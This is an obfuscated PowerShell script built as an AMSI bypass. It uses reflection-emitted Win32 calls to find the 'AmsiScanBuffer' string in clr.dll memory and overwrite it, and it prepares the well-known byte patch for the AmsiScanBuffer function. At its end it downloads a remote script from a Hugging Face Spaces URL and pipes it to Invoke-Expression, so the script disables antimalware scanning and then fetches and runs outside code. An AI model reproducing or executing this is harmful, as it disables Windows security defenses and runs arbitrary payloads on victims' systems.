Set-Location $env:TEMP

${Pa`Ge`_`REAdO`NlY} = 0x02
${P`AGe`_rEA`DW`RItE} = 0x04
${pAgE`_ExECu`Te`_ReADWrI`TE} = 0x40
${pAgE`_EXeCUTE`_`REad} = 0x20
${P`AG`e_GU`Ard} = 0x100
${M`Em_`cOmm`iT} = 0x1000
${MAx`_Path} = 260


function IsReadable {
    param (${prO`TecT}, ${S`TatE})
    return (((${p`RotecT} -band ${PaGe_`R`E`A`dONLY}) -eq ${P`AGe_r`Ea`Don`LY} -or (${PrO`Te`cT} -band ${Pag`E_rEa`D`WRi`TE}) -eq ${pA`g`E_REAdwRi`Te} -or (${p`R`OtEct} -band ${PaGe`_ExecUTE_ReAD`w`RIte}) -eq ${pAgE_Exe`cutE_`Re`Ad`wrItE} -or (${P`ROt`ect} -band ${PagE_E`Xe`cu`TE_rE`AD}) -eq ${p`AGE_eX`e`CuTE_rEAd}) -and (${P`R`oTEcT} -band ${p`AGe`_`gUaRd}) -ne ${P`Age_`Gua`RD} -and (${ST`AtE} -band ${Mem_`cOMM`It}) -eq ${M`Em_Comm`IT})
}

function PatternMatch {
    param (${b`Uf`FEr}, ${p`A`TtErn}, ${I`NDEX})
    for (${I} = 0; ${i} -lt ${P`ATt`eRN}.Length; ${I}++) {
        if (${b`UffEr}[${IN`deX} + ${i}] -ne ${PatT`E`RN}[${I}]) {
            return ${f`Alse}
        }
    }
    return ${T`RUE}
}

    
    ${dy`NAss`eMb`ly} = New-Object System.Reflection.AssemblyName("Win32")
    ${aSSEm`B`LYbU`i`LdEr} = [AppDomain]::CurrentDomain.DefineDynamicAssembly(${D`YNAS`seMB`Ly}, [Reflection.Emit.AssemblyBuilderAccess]::Run)
    ${Mo`duL`eb`Ui`ldER} = ${a`SSEmBL`YB`UiLDER}.DefineDynamicModule("Win32", ${f`A`lSE})

    
    ${Ty`P`ebuIl`DER} = ${ModU`Leb`UI`L`DeR}.DefineType("Win32.MEMORY_INFO_BASIC", [System.Reflection.TypeAttributes]::Public + [System.Reflection.TypeAttributes]::Sealed + [System.Reflection.TypeAttributes]::SequentialLayout, [System.ValueType])
    [void]${tYP`EB`UiL`der}.DefineField("BaseAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public)
    [void]${TY`pEBUIlD`er}.DefineField("AllocationBase", [IntPtr], [System.Reflection.FieldAttributes]::Public)
    [void]${Ty`pEBuI`LD`er}.DefineField("AllocationProtect", [Int32], [System.Reflection.FieldAttributes]::Public)
    [void]${tYp`eBU`IlD`eR}.DefineField("RegionSize", [IntPtr], [System.Reflection.FieldAttributes]::Public)
    [void]${TYpEBUI`l`dEr}.DefineField("State", [Int32], [System.Reflection.FieldAttributes]::Public)
    [void]${T`Yp`EBui`LdER}.DefineField("Protect", [Int32], [System.Reflection.FieldAttributes]::Public)
    [void]${TypEb`Ui`LD`er}.DefineField("Type", [Int32], [System.Reflection.FieldAttributes]::Public)
    ${meMO`RY_`INfo_`B`As`ic_st`RUCt} = ${ty`peBu`ild`eR}.CreateType()

    
    ${tYp`EbUIld`Er} = ${MOd`UlEb`UiLDEr}.DefineType("Win32.SYSTEM_INFO", [System.Reflection.TypeAttributes]::Public + [System.Reflection.TypeAttributes]::Sealed + [System.Reflection.TypeAttributes]::SequentialLayout, [System.ValueType])
    [void]${tYp`eBu`i`LdEr}.DefineField("wProcessorArchitecture", [UInt16], [System.Reflection.FieldAttributes]::Public)
    [void]${tYpeBu`iL`dER}.DefineField("wReserved", [UInt16], [System.Reflection.FieldAttributes]::Public)
    [void]${typ`Eb`U`IldEr}.DefineField("dwPageSize", [UInt32], [System.Reflection.FieldAttributes]::Public)
    [void]${T`Ype`BUi`LDeR}.DefineField("lpMinimumApplicationAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public)
    [void]${TYpEbu`il`d`eR}.DefineField("lpMaximumApplicationAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public)
    [void]${Ty`peBUi`LDer}.DefineField("dwActiveProcessorMask", [IntPtr], [System.Reflection.FieldAttributes]::Public)
    [void]${t`YpEB`UilD`er}.DefineField("dwNumberOfProcessors", [UInt32], [System.Reflection.FieldAttributes]::Public)
    [void]${TYPE`BUi`LDeR}.DefineField("dwProcessorType", [UInt32], [System.Reflection.FieldAttributes]::Public)
    [void]${Ty`PEb`UIL`DeR}.DefineField("dwAllocationGranularity", [UInt32], [System.Reflection.FieldAttributes]::Public)
    [void]${tY`Peb`UilDER}.DefineField("wProcessorLevel", [UInt16], [System.Reflection.FieldAttributes]::Public)
    [void]${tyP`eB`UiLD`Er}.DefineField("wProcessorRevision", [UInt16], [System.Reflection.FieldAttributes]::Public)
    ${s`yStEM`_`iNFo_s`T`RUcT} = ${tyPE`Bu`il`der}.CreateType()

    
    ${tYPEbUil`d`er} = ${M`oDU`l`EBuIldeR}.DefineType("Win32.Kernel32", "Public, Class")
    ${DlliM`p`ORTcoNsT`RUCT`or} = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
    ${sETlasteR`R`or} = [Runtime.InteropServices.DllImportAttribute].GetField("SetLastError")
    ${S`ETLasterRorc`U`StOM`AttRi`ButE} = New-Object Reflection.Emit.CustomAttributeBuilder(${d`L`LimPO`RtcOn`stRu`CToR}, "kernel32.dll", [Reflection.FieldInfo[]]@(${seTLAS`Te`R`ROR}), @(${t`Rue}))

    
    ${p`INVokEmETH`Od} = ${TYPe`BUil`D`er}.DefinePInvokeMethod("VirtualProtect", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [bool], [Type[]]@([IntPtr], [IntPtr], [Int32], [Int32].MakeByRefType()), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
    ${pi`NVok`EmETHod}.SetCustomAttribute(${S`e`T`lA`StERROR`CUS`TO`maT`TrIBuTE})

    
    ${piNvO`KEME`T`h`od} = ${t`Y`P`ebuilDEr}.DefinePInvokeMethod("GetCurrentProcess", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [IntPtr], [Type[]]@(), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
    ${piNVOke`M`E`THod}.SetCustomAttribute(${SetlAs`TE`RrOr`CuS`TOmAtTR`IbuTe})

    
    ${P`In`VO`KEME`ThOd} = ${tY`PEbu`IL`DeR}.DefinePInvokeMethod("VirtualQuery", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [IntPtr], [Type[]]@([IntPtr], [Win32.MEMORY_INFO_BASIC].MakeByRefType(), [uint32]), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
    ${p`InvOK`e`M`ethod}.SetCustomAttribute(${SeTLASTE`RRorC`U`sto`mA`TtRi`BUtE})

    
    ${PI`N`Vo`kE`meThoD} = ${typeb`U`ild`Er}.DefinePInvokeMethod("GetSystemInfo", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [void], [Type[]]@([Win32.SYSTEM_INFO].MakeByRefType()), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
    ${pin`V`OkeMEthoD}.SetCustomAttribute(${Se`TLAS`TERroR`Cu`sTOMAttRIb`U`Te})

    
    ${pI`NVo`KEM`EThoD} = ${tyP`Eb`Ui`LDeR}.DefinePInvokeMethod("GetMappedFileName", "psapi.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [Int32], [Type[]]@([IntPtr], [IntPtr], [System.Text.StringBuilder], [uint32]), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
    ${p`InVokE`MeT`hOD}.SetCustomAttribute(${seT`L`ASt`eRrorCUs`ToMa`TTrIbU`TE})

    
    ${PINvO`Ke`Me`ThoD} = ${T`Y`pEbuIL`DeR}.DefinePInvokeMethod("ReadProcessMemory", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [Int32], [Type[]]@([IntPtr], [IntPtr], [byte[]], [int], [int].MakeByRefType()), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
    ${p`INVOKE`MethOD}.SetCustomAttribute(${setL`AstE`R`RorcUst`Om`AtTr`ib`UtE})

    
    ${PinV`oKeMeT`h`oD} = ${ty`PeBui`LD`Er}.DefinePInvokeMethod("WriteProcessMemory", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [Int32], [Type[]]@([IntPtr], [IntPtr], [byte[]], [int], [int].MakeByRefType()), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
    ${p`inVO`K`eMEThoD}.SetCustomAttribute(${set`la`sTeRROrc`UStO`M`AtTriBuTE})


    ${KE`RNEl`32} = ${t`YpEbu`IldeR}.CreateType()

    ${a} = "Ams"
    ${B} = "iSc"
    ${C} = "anBuf"
    ${D} = "fer"
    ${SIg`NAt`URe} = [System.Text.Encoding]::UTF8.GetBytes(${a} + ${B} + ${c} + ${d})
    ${hP`Roce`Ss} = [Win32.Kernel32]::GetCurrentProcess()

    
    ${sySI`N`Fo} = New-Object Win32.SYSTEM_INFO
    [void][Win32.Kernel32]::GetSystemInfo([ref]${s`YsiNFo})

    
    ${memO`RyREg`Io`NS} = @()
    ${aD`dReSS} = [IntPtr]::Zero

    while (${Add`Re`sS}.ToInt64() -lt ${SyS`info}.lpMaximumApplicationAddress.ToInt64()) {
        ${meMI`N`FO} = New-Object Win32.MEMORY_INFO_BASIC
        if ([Win32.Kernel32]::VirtualQuery(${ad`d`ResS}, [ref]${M`emI`NFo}, [System.Runtime.InteropServices.Marshal]::SizeOf(${MEmiN`FO}))) {
            ${memoR`Yr`egI`o`Ns} += ${ME`m`iNFo}
        }
        
        ${ADDrE`SS} = New-Object IntPtr(${M`em`InFo}.BaseAddress.ToInt64() + ${m`EmiN`Fo}.RegionSize.ToInt64())
    }

    ${c`o`UnT} = 0
    
    $InitialDate=Get-Date;
    
    
    foreach (${Re`gI`on} in ${ME`M`oRy`R`eGiOns}) {
        
        if (-not (IsReadable ${reGI`ON}.Protect ${rEGi`ON}.State)) {
            continue
        }
        
        ${PaTh`BU`il`DER} = New-Object System.Text.StringBuilder ${m`Ax_p`ATH}
        if ([Win32.Kernel32]::GetMappedFileName(${hPROC`e`ss}, ${r`EgIOn}.BaseAddress, ${pa`Thbu`IlD`eR}, ${MA`X`_PaTh}) -gt 0) {
            ${Pa`TH} = ${PaThBu`ILd`ER}.ToString()
            if (${Pa`TH}.EndsWith("clr.dll", [StringComparison]::InvariantCultureIgnoreCase)) {
                
                ${Bu`F`FEr} = New-Object byte[] ${R`EGI`on}.RegionSize.ToInt64()
                ${bYTesR`E`Ad} = 0
                [void][Win32.Kernel32]::ReadProcessMemory(${h`pr`OCeSs}, ${reg`i`on}.BaseAddress, ${B`UFf`ER}, ${BUf`F`er}.Length, [ref]${Byte`sRE`AD})
                for (${K} = 0; ${K} -lt (${b`y`TESread} - ${S`IG`NATUre}.Length); ${K}++) {
                    ${F`oUnD} = ${T`RUE}
                    for (${m} = 0; ${m} -lt ${S`i`gnAturE}.Length; ${m}++) {
                        if (${BU`F`FEr}[${k} + ${M}] -ne ${SI`GNa`TURE}[${M}]) {
                            ${FO`Und} = ${f`Al`Se}
                            break
                        }
                    }
                    if (${FOu`ND}) {
                        ${o`lDpRo`TECT} = 0
                        if ((${re`gi`on}.Protect -band ${Pa`g`e_`ReADWR`ite}) -ne ${pagE`_R`ea`dw`RITE}) {
                            [void][Win32.Kernel32]::VirtualProtect(${rEg`IOn}.BaseAddress, ${Buff`er}.Length, ${p`A`Ge_eX`E`CU`TE_rEADwr`ITe}, [ref]${OL`dP`RO`TEct})
                        }
                        ${R`epL`ACEME`Nt} = New-Object byte[] ${SI`G`NAturE}.Length
                        ${b`YtESwR`ITteN} = 0
                        [void][Win32.Kernel32]::WriteProcessMemory(${hPr`oc`Ess}, [IntPtr]::Add(${reg`iON}.BaseAddress, ${K}), ${REplAc`emE`NT}, ${ReP`Lac`E`mENt}.Length, [ref]${By`T`eswR`i`TTEn})
                        ${cO`UnT}++
                        if ((${regi`ON}.Protect -band ${PAGE_`READWR`i`Te}) -ne ${paGE_`REaD`wriTE}) {
                            [void][Win32.Kernel32]::VirtualProtect(${r`egion}.BaseAddress, ${bu`F`FeR}.Length, ${rE`GION}.Protect, [ref]${OL`D`p`RotECt})
                        }
                    }
                }
            }
        }
    }

Add-Type @"
using System;using System.Runtime.InteropServices;public class Win32{[DllImport("kernel32")]public static extern IntPtr GetProcAddress(IntPtr h,string p);[DllImport("kernel32")]public static extern IntPtr LoadLibrary(string n);[DllImport("kernel32")]public static extern bool VirtualProtect(IntPtr a,UIntPtr s,uint p,out uint o);}
"@

${c`ou`NT}

$LoadLibrary = [Win32]::LoadLibrary("am" + "si.dll")

$Address = [Win32]::GetProcAddress($LoadLibrary, "Amsi" + "Scan" + "Buffer")

$p = 0

[Win32]::VirtualProtect($Address, [uint32]6, 0x40, [ref]$p)

$Patch = [Byte[]](0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)

$FinishDate=Get-Date;

$TimeElapsed = ($FinishDate - $InitialDate).TotalSeconds;

Start-Sleep -Seconds ([math]::Round($TimeElapsed))

(New-Object Net.WebClient).DownloadString('https://huggingface.co/spaces/enotkrutoy/gggg/raw/main/test/Add-Type5.ps1')|iex